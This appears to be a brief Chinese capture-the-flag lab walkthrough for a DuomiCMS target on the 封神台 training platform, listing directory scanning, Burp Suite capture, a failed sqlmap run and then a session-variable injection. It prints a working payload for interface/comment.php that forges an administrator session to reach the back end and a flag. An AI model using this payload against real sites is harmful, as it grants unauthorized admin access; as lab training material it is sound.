-
使用御剑扫描 后台路径
-
使用burpsuite 抓包获取信息
-
使用sqlmap扫描看是否有注入漏洞
-
这是1.txt里面内容是抓包的信息
-
扫描未发现注入点寻找cms的漏洞
- 百度搜索 duomicms漏洞 (下面为讲解cms漏洞原理的文章)
-
封神台传送门网址 进行渗透
-
http://pu2lh35s.ia.aqlab.cn/tiesan/upload/
-
interface/comment.php_SESSION[duomi_ckstr]=dfwb&_SESSION[duomi_ckstr_last]=&_SESSION[duomi_admin_id]=1&_SESSION[duomi_admin_name]=admin&_SESSION[duomi_group_id]=1
- 将网址 和 注入 漏洞拼接 具体看上面文章 得到如下图
- 再次登录后台界面 如下图 找到 微信的flag
-